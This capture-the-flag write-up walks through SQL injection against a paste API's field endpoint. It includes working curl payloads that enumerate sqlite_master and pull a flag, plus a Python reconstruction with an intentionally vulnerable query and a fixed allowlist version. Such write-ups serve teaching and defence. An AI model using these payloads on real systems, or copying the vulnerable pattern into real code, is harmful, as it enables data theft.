Rating:

Upon opening the challenge link, we are shown an API description:

![Trashbin_Api](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/1_1.png)

We can create a paste, delete it, read the whole paste, or read a single field of it (`title` or `text`).

Even though this challenge was easy, it took us quite a while to solve, because we first went down a completely different path.

Let's start by creating a paste:

```bash
th3jackers$ curl -X POST http://chall.bsidesalgiers.com:8001/paste/new -H "Content-Type: application/json" -d '{"title":"just a title","text":"just a content"}'

{"success":true,"url":"/paste/veisbzgx"}
```

Let's read it:

```bash
th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx

{"success":true,"text":"just a content","title":"just a title"}
```
After a few tries it seems there is nothing interesting here, so let's try reading a single field:

```bash
th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx/title

just a title

th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx/text

just a content
```
Hmm, this is a bit different: no JSON object is returned, only the raw value.
We tried injecting expressions such as `1+1`, and it returned `2` instead of an error; a quoted string was echoed back as well.

We spent some time here trying to figure out how the field was being evaluated.

First we thought it was Python-related (since this is a Flask app): maybe the app fetches the paste from the database, puts it in a dictionary and then indexes the dictionary by the field name. But that didn't really explain what we were seeing.

Then my teammate tried `*` as the field, and this is what happened:

```bash
th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx/*

veisbzgx
```

That was the trigger: my teammate guessed it must be a classic SQL injection, and indeed it was. The field name is concatenated straight into the SELECT list of a query of the form `SELECT <field> FROM <table> WHERE ...`, and the endpoint presumably returns the first column of the first row, which is why `*` gives back the paste's own id. The backend turned out to be SQLite: we tried the same inputs locally and SQLite returned exactly the same outputs.

The rest was easy. First, get the table name:

```bash
th3jackers$ curl "http://chall.bsidesalgiers.com:8001/paste/veisbzgx/name%20from%20sqlite_master%20WHERE%20type='table'%20union%20select%20'x'"

pastes
```

Then get the id of the paste containing the flag.

P.S.: `union select 'x'` plays the role of a comment here, because regular SQL comments somehow didn't work for us. It does not actually comment anything out: the remainder of the original query (`FROM ... WHERE ...`) is absorbed into the second SELECT, so the whole statement stays syntactically valid. Since SQLite's UNION removes duplicates through a sorted temporary table, the dummy `'x'` row in practice lands after the value we want, and only the real value comes back as the first row. Be aware that any value sorting after `'x'` would be hidden behind the dummy row. Note also that the LIKE pattern below is wrapped in double quotes (`%22`); SQLite accepts a double-quoted token as a string literal only as a legacy fallback when it does not resolve to a column name.

```bash
th3jackers$ curl "http://chall.bsidesalgiers.com:8001/paste/veisbzgx/id%20from%20pastes%20where%20text%20like%20%22%shellmates%7B%%22%20%20union%20select%20'x'"

sp05m8vu
```

Finally, read the text of that paste:

```bash
th3jackers$ curl "http://chall.bsidesalgiers.com:8001/paste/sp05m8vu/text"

shellmates{2021_y3t_sQl_1nj3ct10ns_4r3_st1ll_4_pr0bl3m}
```
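To see the whole chain in one place, the following is an added example, not the challenge's own source (which this writeup never shows): a hypothetical reconstruction of the bug with Python's `sqlite3` module, run against a constructed in-memory `pastes` table. The schema, the second paste's title and the use of the flag as its text are assumptions; `read_field_vulnerable` mirrors the observed behaviour (field interpolated into the SELECT list, first column of the first row returned), and `read_field_fixed` is the hardened counterpart that allowlists the column name and binds the id as a parameter. The LIKE payload uses single quotes instead of the writeup's double quotes so it does not rely on SQLite's legacy double-quoted-string fallback.

```python
import sqlite3

# Constructed sample data (not from the challenge): the writeup only reveals a
# `pastes` table with `id`/`title`/`text` fields, so this schema, the second
# paste's title and the use of the flag as its text are assumptions.
SCHEMA = "CREATE TABLE pastes (id TEXT PRIMARY KEY, title TEXT, text TEXT)"
ROWS = [
    ("veisbzgx", "just a title", "just a content"),
    ("sp05m8vu", "flag", "shellmates{2021_y3t_sQl_1nj3ct10ns_4r3_st1ll_4_pr0bl3m}"),
]

# The payloads from the writeup, keyed by what they demonstrate.  The LIKE
# pattern uses single quotes here; the original used double quotes, which
# SQLite only accepts as a string literal through a legacy fallback.
PAYLOADS = {
    "text": "text",
    "arith": "1+1",
    "star": "*",
    "tables": "name from sqlite_master WHERE type='table' union select 'x'",
    "flag_id": "id from pastes where text like '%shellmates{%' union select 'x'",
}


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO pastes VALUES (?, ?, ?)", ROWS)
    return conn


def read_field_vulnerable(conn, paste_id, field):
    """Hypothetical reconstruction of the challenge's bug: the field name is
    interpolated into the SELECT list, so it becomes an arbitrary SQL
    expression (or a whole UNION).  Only the first column of the first row is
    returned, which is what the /paste/<id>/<field> endpoint echoed back."""
    query = f"SELECT {field} FROM pastes WHERE id = '{paste_id}'"
    row = conn.execute(query).fetchone()
    return None if row is None else row[0]


ALLOWED_FIELDS = ("title", "text")


def read_field_fixed(conn, paste_id, field):
    """Hardened version: column names cannot be bound as parameters, so the
    field is checked against a fixed allowlist and the id is bound with ?."""
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"unknown field: {field!r}")
    row = conn.execute(f"SELECT {field} FROM pastes WHERE id = ?", (paste_id,)).fetchone()
    return None if row is None else row[0]


def fixed_rejects(conn, paste_id, field):
    """True when the hardened reader refuses the field name."""
    try:
        read_field_fixed(conn, paste_id, field)
    except ValueError:
        return True
    return False


def reproduce(conn):
    """Run every payload against the vulnerable reader, as the writeup did."""
    return {name: read_field_vulnerable(conn, "veisbzgx", p) for name, p in PAYLOADS.items()}


def exploit(conn):
    """The full chain: table name, flag paste id, then that paste's text."""
    table = read_field_vulnerable(conn, "veisbzgx", PAYLOADS["tables"])
    flag_id = read_field_vulnerable(conn, "veisbzgx", PAYLOADS["flag_id"])
    return table, flag_id, read_field_vulnerable(conn, flag_id, "text")


if __name__ == "__main__":
    db = make_db()
    for name, value in reproduce(db).items():
        print(f"{name:8} -> {value!r}")
    print("chain   ->", exploit(db))
    print("fixed rejects '*':", fixed_rejects(db, "veisbzgx", "*"))
```

Running the script prints the same values the curl requests returned (`2`, `veisbzgx`, `pastes`, `sp05m8vu`, then the flag), while the hardened reader rejects `*` and the UNION payloads outright. The allowlist is the important part: a parameter binding cannot protect an identifier position, so any user-chosen column or table name must be validated against a fixed set before it touches the query string.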

Flag: `shellmates{2021_y3t_sQl_1nj3ct10ns_4r3_st1ll_4_pr0bl3m}`